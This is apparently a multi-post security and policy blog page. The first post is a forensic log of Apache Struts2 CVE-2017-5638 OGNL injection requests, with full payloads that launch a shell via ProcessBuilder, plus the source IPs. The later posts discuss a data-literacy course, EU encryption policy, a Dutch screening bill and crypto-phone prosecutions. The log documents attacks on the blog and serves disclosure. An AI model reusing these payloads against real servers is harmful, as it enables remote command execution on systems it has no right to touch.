blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

UPDATE 2018-02-10: more log entries in Feb 2018, first one listing struts-pwn, a tool to test systems for CVE-2017-5638 (and perform remote command execution), released 11 months ago):

blog.cyberwar.nl-forensic.log:+31342:5a36c21f:65|GET / HTTP/1.1|Host:149.210.129.7|Connection:keep-alive|Accept-Encoding:gzip, deflate|Accept:*/*|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tokjuoq','tokjuoq')}.multipart/form-data
blog.cyberwar.nl-forensic.log:+536:5a7ee6a9:7d|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/ HTTP/1.1|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ("c9fd5ad9-e018-4118-9b93-6ed84ee84121"),#matt.getWriter().flush(),#matt.getWriter().close())}|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
blog.cyberwar.nl-forensic.log:+28292:5a7ee6a9:162|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D HTTP/1.1|User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive

EOF

Calling Bullshit in the Age of Big Data – free/open lectures, tools and case-studies from Washington U Spring 2017 class

The University of Washington had a Spring 2017 class entitled “Calling Bullshit in the Age of Big Data” and makes available the lecture materials at www.callingbullshit.org (Syllabus, Videos, Tools, Case Studies, FAQ).

Lecture titles:

  1. Introduction to bullshit
  2. Spotting bullshit
  3. The natural ecology of bullshit
  4. Causality
  5. Statistical traps
  6. Visualization
  7. Big data
  8. Publication bias
  9. Predatory publishing and scientific misconduct
  10. The ethics of calling bullshit.
  11. Fake news
  12. Refuting bullshit

The course (Twitter: @callin_bull) was created by (mathematical) biology professor Carl T. Bergstrom (Twitter: @CT_Bergstrom) and associate professor data science and ‘science of science’ Jevin West (Twitter: @JevinWest), both affiliated with the University of Washington.

Coverage at The New Yorker: How to Call B.S. on Big Data: A Practical Guide (this link was posted at Hacker News).

Coverage at Salon.com: Explosive growth in bulls**t studies! The latest academic frontier in the age of You Know Who .

Further reading:

EOF

EU LIBE proposes end-to-end encryption in e-Communications; and, re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

This post shortly highlights two developments regarding EU internet privacy/security.

1. EU LIBE proposes amendment of draft e-Communications regulation to promote end-to-end encryption, seeks prohibition of Member State legislation that would “[weaken] security and encryption”

The EU LIBE Committee released a draft report (.pdf), dated June 9th 2017, on the proposed e-Communications regulation, and specifically promotes end-to-end encryption in Amendment 116:

“The providers of electronic communications services shall ensure that there is sufficient protection in place against unauthorised access or alterations to the electronic communications data, and that the confidentiality and safety of the transmission are also guaranteed by the nature of the means of transmission used or by state-of-the-art end-to-end encryption of the electronic communications data. (…)”

The remainder of that amendment seeks prohibition of nation-level legislation that would “[weaken] security and encryption of their networks and services”:

“The Furthermore, when encryption of electronic communications data is used, decryption, reverse engineering or monitoring of such communications shall be prohibited. Member States shall not impose any obligations on electronic communications service providers that would result in the weakening of the security and encryption of their networks and services.

This, of course, is at odds with interests regarding intelligence & security, which range from the ability to detect & thwart computer network attack/exploitation to the ability to detect and monitor plans to sabotage or steal military equipment or dual-use goods (Wassenaar). It is certainly different from the direction where the European Commission has been heading for years; to that end, also take a look at the The Effect of Encryption on Lawful Access to Communications and Data (.pdf, February 2017, Center for Int’l Security Studies; by Lewis, Cheng & Carter).

The promotion of end-to-end encryption by EU LIBE is not unexpected: part 2 of the STOA study “Mass Surveillance”, dated January 2015, recommended the promotion of end-to-end encryption, and provided several policy options for that. Specifically, see the last paragraph of the following section in the management summary (all emphasis is original) :

(…)

Policy options for the ‘Promote adoption’ scenario

Promote end-to-end encryption

Stimulate awareness of the necessity of using encryption by initiating a media campaign, as awareness of privacy risks is quite low.

Increase the knowledge level of end-users, both individuals and responsible departments in organisations, by setting up an independent platform where users can find information on tools, implementation, do’s and don’ts etc.

Support product security tests by independent institutions such as the Electronic Frontier Foundation that help users make better-informed choices. Support can be a financial contribution, but also promotion of the results. Alternatively the EU can set up its own regular product security test programme.

A parallel option is to stimulate user-friendliness of end-to-end encryption solutions, for instance by promoting existing user-friendly end-to-end encryption solutions for e-mail, messaging, chat etc. Dedicated funding or participation in open-source software end-to-end encryption solutions is also an option to specifically improve user-friendliness.

If the market does not provide security with end-to-end encryption by itself, regulation should be considered, obliging service providers and/or Internet service providers to provide end-to-end protection as standard for data in transit. An additional benefit of regulation would be a concrete political discussion on the balance between privacy and law enforcement and national security, at European and/or national level. The outcome of this debate should be implemented in national legislation.

(…)

I’m not sure what LIBE’s intent / expectation is wrt Amendment 116; to me, it looks like something that is not intended to be adopted “as is” as part of the e-Communications regulation, but rather as something to stimulate debate, which could have a beneficial effect on the final regulation. But I may be wrong.

2. Re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

On June 13th 2017, the Article 29 Working Party (“WP29”) released a press statement (.pdf), entitled “Preparation of the Privacy Shield annual Joint Review”, that references bulk collection, e.g. of communication or databases containing data about persons, in relation to the EU/US Privacy Shield:

“Regarding the law enforcement and national security part, the WP 29 has questions relating in particular to the latest developments of US law and jurisprudence in the field of privacy. The WP29 also seeks, inter alia, precise evidence to show that bulk collection, when it exists, is “as tailored as feasible”, limited and proportionate. In addition, the WP29 stresses the need to obtain information concerning the nomination of the four missing members of the PCLOB as well as on the appointment of the Ombudsperson and the procedures governing the Ombudsperson mechanism, as they are key elements of the oversight architecture of the Privacy Shield.”

Tip of the Hat to Bavo Van den Heuvel (Twitter: @BavoCranium), who highlighted this in a post on LinkedIn.

Unrelated side note: the revision of the Dutch Intelligence & Security Act of 2002 (“Wiv2002”), tentatively referred to as “Wiv20xx”, expands the Wiv2002 such that the Dutch intelligence and security services (domest: AIVD; military: MIVD) can perform untargeted / bulk search interception of cable communications, and explicitly allows acquisition of bulk data sets through hacking or voluntary cooperation (for instance through remote access); not unlike the bulk powers in the U.K. (more). The oversight framework is significantly revised as well, for instance through addition of ex ante oversight. The Wiv20xx was adopted by the Dutch lower house in Q1/2017 and is now being evaluated by the Dutch senate; its status in the legislative progress can be seen here.

EOF

[Dutch] Wetsvoorstel “VOG politiegegevens”: politiegegevens als zelfstandige weigeringsgrond bij VOG-beoordeling

TL;DR: het concept-wetsvoorstel “VOG politiegegevens” beoogt het mogelijk te maken een VOG ook te kunnen weigeren op grond van politiegegevens, zonder dat sprake is van een strafblad. De concept-MvT stelt dat het voorstel is gericht op functies betreffende BOAs, DJI, en OM, maar de tekst van het concept-wetsvoorstel beperkt het niet tot die functies; uitbreiding naar andere functies wordt overgelaten aan AMvB en ministeriële regeling (dus: beslissing minister, zonder tussenkomst Tweede Kamer).
In de wereld van IT-beveiligers bestaan situaties waarin (mogelijk) behoefte is aan screening die verder gaat dan een VOG, maar het zwaardere VGB (screening door AIVD/MIVD) niet mogelijk is: die kun je, anders dan een VOG-screening, als opdracht-/werkgever niet zomaar aanvragen; dat kan alleen voor aangewezen vertrouwensfuncties. Het ‘gat’ tussen VOG en VGB kan, althans t.a.v. politiegegevens, niet worden ingevuld door particuliere screeningsbedrijven: zij hebben geen toegang tot politiegegevens.
Vraag: zou het wenselijk zijn de werking van dit wetsvoorstel uit te breiden naar functies in de private sector, en zo ja, hoe zou een beoordelingskader eruit kunnen zien voor besluitvorming een VOG op grond van politiegegevens te weigeren aan personen die betrokken zijn bij bijv. red teaming, penetratietests, en kwetsbaarhedenscans,  en als zodanig regelmatig en soms hoge toegangsrechten hebben of mogen verwerven tot gegevens, systemen en netwerken
? Denk bijvoorbeeld aan een geseponeerde zaak wegens computercriminaliteit: onschuldpresumptie versus belangen bij VGB-beoordeling.

Het concept-wetsvoorstel “Verklaring Omtrent Gedrag (VOG) politiegegevens”, dat momenteel in consultatie is (einddatum: 12 juli 2017), ziet op uitbreiding van VOG-weigeringsgronden van justitiële/strafvorderlijke gegevens naar politiegegevens. Justitiële/strafvorderlijke gegevens betreffen beslissingen van het OM en de rechter (lees: strafblad), en gegevens die op het niveau van het OM en de rechterlijke macht zijn verzameld. Politiegegevens zijn veel ruimer: “elk persoonsgegeven dat in het kader van de uitoefening van de politietaak wordt verwerkt” (Artikel 35, eerste lid, Wjsg).

Beoogd wordt het mogelijk te maken politiegegevens als zelfstandige weigeringsgrond te hanteren bij de VOG-beoordeling, althans voor functies die voldoen aan bij Algemene Maatregel van Bestuur (AMvB) te bepalen criteria, bij ministeriële regeling vast te stellen. De concept-Memorie van Toelichting (MvT) van 7 maart 2017 van het wetsvoorstel stelt daarbij:

“(…) Bij deze functies wordt vooralsnog gedacht aan functies binnen het veiligheidsdomein zoals bij de DJI, BOA’s en het OM. Voor personen met een functie die een hoge mate van integriteit vereist, bestaat reeds een afwijkende termijn voor de gegevens die mee kunnen wegen bij de beoordeling van de VOG-aanvraag. De terugkijktermijn is voor deze functies niet beperkt tot de standaardtermijn van vier jaren, maar is langer. In principe geldt een terugkijktermijn van tien jaren, zoals bij BOA’s het geval is. Voor bepaalde functies, zoals inrichtingspersoneel van de DJI, is deze termijn in de Beleidsregels VOG NP-RP 2013 verder verlengd tot dertig jaren.”

Vervolgens wordt een voorbeeld gegeven:

“Graag geef ik een voorbeeld van een zaak van een persoon met een functie die een hoge mate van integriteit vereist waarbij politiegegevens bij de VOG-beoordeling als zelfstandige weigeringsgrond van toepassing zouden kunnen zijn. Het betreft een zaak waarin uit de politiegegevens blijkt dat een potentiële BOA een geweldsincident in een horecagelegenheid heeft uitgelokt. De betreffende persoon was daarbij aantoonbaar onder invloed van alcohol en mogelijk ook van drugs. De politie was ter plaatse en heeft de man meegenomen voor verhoor en een blaastest. Wanneer bovendien blijkt dat volgens informatie van de politie de man meermalen dronken is gesignaleerd in uitgaansgelegenheden waarvan bovendien bekend is dat er veelvuldig harddrugs worden gebruikt en verhandeld, kan dit relevant zijn voor de beoordeling van zijn VOG-aanvraag. Van personen met een (toekomstige) functie die een hoge mate van integriteit vereist, mag immers verwacht worden dat zij een onberispelijke voorgeschiedenis hebben.”

Het wetsvoorstel ziet op de volgende politiegegevens:

(…) Bij personen met de bedoelde functies kunnen politiegegevens die wijzen op onbehoorlijk gedrag relevant zijn, ondanks dat er (nog) geen vervolging is ingesteld of veroordeling heeft plaatsgevonden. Vanwege het onbesproken gedrag dat een dergelijke persoon dient te hebben, is gekozen voor verstrekking van de politiegegevens, bedoeld in de artikelen 8, 9, 10, eerste lid, onderdelen a en c, en 13 van de Wpg. Dat betekent dat bij de beoordeling van de VOG die kan worden geweigerd op basis van politiegegevens gebruik kan worden gemaakt van de volgende politiegegevens:

  1. politiegegevens die worden verwerkt met het oog op de uitvoering van de dagelijkse politietaak (artikel 8 Wpg);
  2. politiegegevens die worden verwerkt ten behoeve van een onderzoek met het oog op de handhaving van de rechtsorde in een bepaald geval (artikel 9 Wpg);
  3. politiegegevens die worden verwerkt met het oog op het verkrijgen van inzicht in de betrokkenheid van personen bij het beramen of plegen van bepaalde ernstige misdrijven (artikel 10, eerste lid, onderdeel a, Wpg);
  4. politiegegevens die worden verwerkt met het oog op het verkrijgen van inzicht in de betrokkenheid van personenbij handelingen die, gezien hun aard of frequentie of het georganiseerde verband waarin zij worden gepleegd, een ernstige schending van de openbare orde vormen (artikel 10, eerste lid, onderdeel c, Wpg); en
  5. politiegegevens als bedoeld in de artikelen 8, 9 en 10 van de Wpg die ten behoeve van de ondersteuning van de politietaak verder worden verwerkt (artikel 13 Wpg).

De omstandigheden waarin een VOG op grond van politiegegevens zou kunnen worden geweigerd, moeten nog worden uitgewerkt:

“De afgifte van een VOG kan alleen worden geweigerd indien er met betrekking tot de aanvrager relevante politiegegevens bestaan met het oog op de functie waarvoor de VOG is aangevraagd. Het enkele feit dat de aanvrager voorkomt in de politiesystemen is onvoldoende grond om de afgifte van de VOG te weigeren. Bij de beoordeling van de politiegegevens zal bijvoorbeeld rekening worden gehouden met het soort gegeven, de frequentie en de actualiteit van de gegevens. Dit beoordelingskader zal in de beleidsregels VOG van Justis verder worden uitgewerkt.

Men houdt rekening met een flinke hit-rate wanneer in politiegegevens wordt gezocht naar VOG-aanvragers (NB: het is me duidelijk waarop deze inschatting is gebaseerd en of het gaat over alle VOG-aanvragen of alleen VOG-aanvragen voor de functies waar het wetsvoorstel thans voor is bedoeld):

“Burgers kunnen op verschillende manieren voorkomen in de politiesystemen. Niet alleen als verdachte, maar ook als getuige, aangever of anderszins. Ter voorbereiding van het wetsvoorstel wordt nader bezien hoe vaak personen voorkomen in de politiesystemen.

Bij de keuze voor een hit/no hit systeem gaan politie en Justis er op dit moment vanuit dat op jaarbasis 50% van de VOG aanvragen een hit oplevert en in welke zaken aan de politie om toezending van de beschikbare gegevens wordt verzocht.”

Het concept-MvT bevat een schatting van het aantal functies dat (sowieso) binnen scope van het wetsvoorstel valt: het aantal aanvragen voor functies in de groepen Buitengewoon Opsporings Ambtenaar (BOAs), Dienst Justitiële Inrichtingen (DJI) en het OM is 16.200.

In 2016 zijn er in totaal maar liefst 950.000 VOG-aanvragen behandeld. De concept-MvT laat, logischerwijs, de mogelijkheid open dat politiegegevens ook voor andere functies als zelfstandige weigeringsgrond zouden kunnen worden gebruikt; dat kan bij AMvB en ministeriële regeling worden bepaald.

Vanuit mijn eigen beroepsveld, informatiebeveiliging, zou ik me bijvoorbeeld kunnen voorstellen dat er omstandigheden bestaan waarbij je de betrokkene, ondanks een schoon strafblad, misschien liever niet positief door de VOG-beoordeling ziet komen. Dan valt te denken aan politiegegevens waarbij betrokkene in relatie wordt gebracht met activiteiten die onder de Wet Computercriminaliteit vallen. Tegelijkertijd wil je, gezien de aanhoudend grote vraag naar ervaren IT-beveiligers, vermijden dat bonfide hackers die in het verleden (een jaar terug? drie jaar terug? vijf jaar terug? langer?) ongevraagd onderzoek verrichten naar systemen, netwerken en applicaties van derden, die daarvan aangifte deden zonder dat het OM daarop ging vervolgen, geen VOG zouden kunnen krijgen op basis van politiegegevens daarover. Het zou m.i. interessant zijn om, als (prematuur) gedachtenexperiment, na te denken hoe (en hoe niet) voor het IT-beveiligingsveld een beoordelingskader er uit zou kunnen zien voor weigering van een VOG op grond van politiegegevens. Daarbij gaat het natuurlijk niet alleen om hacking-zonder-veroordeling, maar in beginsel om alle zaken die kunnen raken aan betrouwbaarheid; zoals in potentie ook radicalisering of criminele contacten.

(Side note: het zwaardere Verklaring van Geen Bezwaar (VGB), waarbij een screening wordt uitgevoerd door de AIVD of MIVD en waarbij ook politiegegevens kunnen worden geraadpleegd, kan niet vanuit de private sector worden aangevraagd, en particuliere screeningsbedrijven hebben geen toegang tot politiegegevens; er is in die zin in de praktijk een ‘gap’ tussen de VOG en de VGB, en het is voorstelbaar dat er nu of in de nabije toekomst vanuit de private sector een roep komt om de scope van de voorgestelde wet per AMvB / ministeriële regeling uit te breiden van BOA/DJI/OM naar de private sector.)

Mogelijk leesvoer:

  • Vechten tegen spoken in de mist? Over veiligheidsonderzoeken voor vertrouwensfuncties en rechtsbescherming (.pdf, 2013, Nederlands Juristenblad; door Jon Schilder, Jan-Peter Loof en Kees Sparrius; zie p.290-298). Dit (rechts)wetenschappelijke artikel heeft betrekking op VGB-screenings, niet op VOG-screenings, maar bevat achtergronden, zienswijzen en argumentatie die, althans naar mijn lekenoordeel (ik ben techneut, geen jurist of beleidsmaker), wellicht informatief/sturend/afbakenend zouden kunnen zijn bij het denken over beoordelingskaders t.a.v. “VOG politiegegevens”.

EOF

After Ennetcom, Dutch police makes arrests re: PGP Safe, another Dutch company, for allegedly providing crypto phones to (primarily?) the underworld

On 10 May 2017, the Dutch Public Prosecution Office published a press release (in Dutch) regarding arrests made during police investigations into businesses for allegedly providing/selling crypto phones to criminals. Earlier, the Public Prosecution Office made public their investigation into the Nijmegen-based company Ennetcom. The present investigation involves the Amsterdam-based PGP Safe. Here is my (unofficial) translation of the official press release:

New arrests in the Netherlands for providing crypto phones to the underworld

10 May 2017 – Public Prosecution Office

The police has arrested four suspects on Tuesday May 9th in relation to the 26Sassenheim investigation into selling encrypted mobile phones and services to criminals. A 51 year old man from Guizen and a 66 year old man from Amsterdam are being detained on suspicion of money laundering. A 34 year old man from Amsterdam and a 24 year old man from Almere were also arrested. They would have provided support to the older men.

These are not the first arrests en detainments of provider of encrypted phones and services to the underworld. That also happened in April last year in the extensive investigation, 26DeVink, into the Ennetcom company in Nijmegen.

Crypto phones

The money laundering investigation 26Sassenheim was initiated by the Team High Tech Crime of the National Unit of Police. The investigation is focused on two main suspects who offered products and services to, primarily criminals under the trade mark ‘PGP Safe’. The suspects sold customized BlackBerry or Android smartphones that could only communicate in encrypted form. These phones were sold for EUR 1200, on the average. The payments mostly took place as cash payments at public roads.

The Public Prosecution Office suspects the men of laundering part of the yields. The two were presumably supported by family members.

Since 2014, at least 34 Dutch police investigations exist where crypto phones, that the suspects provided, played a role. The investigations involve, among others, (attempted) liquidation and international organized trade in drugs. Police and the Justice Department have clues that suggest the main suspects knew that their products and services were mostly used by criminals in committing such offenses.

Millions of Euro’s and luxurious vehicles

The police and the National Public Prosecutor have searched buildings at eleven locations in the Netherlands. This was done in cooperation with the tax intelligence and investigation service, FIOD. The searches took place in the municipalities of Amsterdam, Huizen, Koggenland and Zandvoort in the province of North Holland, and in Almere and Zeewolde in the province of Flevoland.

A farmhouse of the suspect in Berkhout was seized, as well as a mansion in Amsterdam. The farmhouse has an estimated worth of EUR 600.000 and the building in Amsterdam has an estimated worth of EUR 1.6 million. The police has seized, in total, some 2 million Euro and thirteen vehicles, including luxury editions of Mercedes, Porsche and Audi. Hundreds of phones were found (both BlackBerry and Android phones) and large number of sim cards. Furthermore, 57 bank accounts in the Netherlands are frozen. Simultaneously, the FIOD entered two administrative offices to confiscate the suspects’ book keeping. Several searches were also carried out abroad.

Punishable

The police and the Public Prosecution Office act against persons who (digitally) support or facilitate criminals and criminal organizations. They are prosecuted for laundering and there criminal capital is seized.

Ennetcom

Following 26DeVink, the investigation into Ennetcom, 26Sassenheim is the second large-scale criminal investigation into providers of tools and services for encrypted communication. Both providers are suspected of having provided, to a vast number of criminal customers, means and services, to communicate in encrypted form about serious crime. 26DeVink is still ongoing. It has already yielded information: some 3.6 million messages were decrypted. The investigation into the content and usability of these messages is ongoing.

The Ennetcom case involved a company located in Nijmegen (NL) that sold PGP-enabled BlackBerry phones priced at ~EUR 1500, often with camera and mic removed. According to the Public Prosecution Service, some 40,000 phones were registered (by some 19,000 users). The phones could only communicate with other phones on Ennetcom’s network, and could be remotely wiped by Ennetcom (e.g. in case the phone is lost or stolen). The phones reportedly connected to a server at an IP address that was traced to the telecommunications hub / carrier hotel at 151 Front Street West, Toronto, Canada. On April 18th 2016, a Canadian judge authorized a search of Ennetcom’s server, and “the complete key management system” was found during that search (to my knowledge it is not certain what that refers to, but Symantec PGP Universal Server — part of PGP Support for BlackBerry BES — would be the obvious guess). Data was made available by Canada to the Dutch police on September 19th 2016, which enabled the Dutch police to decrypt user messages. While it is (to my knowledge) not clear what “data” entails here, precisely, the Mutual Legal Assistance in Criminal Matters Act (Re), 2016 ONSC 5699 (CanLII) states:

The Dutch authorities also discovered that the “keys” for the PGP encryption system were generated by the server, rather than by the device. As a result, the Dutch authorities came to believe that the keys to decrypt the PGP encrypted information, on the Ennetcom PGP BlackBerry devices, are stored on Ennetcom’s BlackBerry Enterprise Servers.

So, conceivably, the actual keys were present and handed over, and that was that; although alternative scenarios cannot be ruled out, depending on how the software implements key scheduling etc., in which decryption is not immediately straightforward, but some cryptanalytic method is involved that is feasible depending on whatever other information is present (e.g. all user identifiers, all ciphertexts per user, and all associations between all users, etc.).

Ennetcom’s servers are reported to have been configured such that messages are wiped/overwritten after 48 hours; nonetheless, according to the Public Prosecution Service, some 3,6 million messages were obtained. (Note: “message” as in “instant message”, not as in “email message”; a single conversation can be made up of multiple messages.)

The Public Prosecution Service press release states that prior to seizing Ennetcom’s servers, the police sent a message to all 19,000(ish) users, requesting that if they hold a special profession (such as lawyers, doctors, notaries or clergyman), they inform the police about that (presumably for reasons of due diligence); the police did not receive any response. It is reported that the data remains under Canadian control, and can not be shared further without court approval: “The fear is that unfettered disclosure would expose innocent people to the unjustified attention of police, just because they used an encrypted BlackBerry.”

On March 9th 2017, Ennetcom posted the following press statement:

Press release March 9th, 2017

In response to the press release of the public prosecution service today, in which the public prosecutor indicated to have “cracked” the servers, which the public prosecution had seized from client’s organization Ennetcom, announce I, as the client’s counselor, that first has to be determined, that the public prosecution has done these seizures under false pretenses, based on a suspicion of money laundering with the excuse as if the customers of the phones are criminals.

The file showed that the Ennetcom organization had tens of thousands of customers who bought the phones and the software through resellers and that the public prosecutor could name only 4 actual example cases in which there would have been a PGP phone purchased from a reseller. The company proved to have many customers nationally and internationally, also with governmental agencies and businesses, that wish to safely communicate without being hacked without any criminal reasons. The seizure of the servers was, so it seemed, more an attempt by the public prosecution to gain access on improper grounds to an immense amount of data of tens of thousands in order to “catch fish with a trail-net”.

As if KPN or any other telecom company would simply be invaded and all their possessions being plundered to see who sends a wrongful message.

The public prosecution now tries to give the impression that all servers were cracked, but states at the same time that 3.6 million messages were made accessible, apparently giving the impression as if this would mean a lot of communication. The public prosecutor mentions 40,000 users. However, one message is part of a conversation, so consecutive “yes”, “and then”, “what do you mean”, are three messages in one conversation.

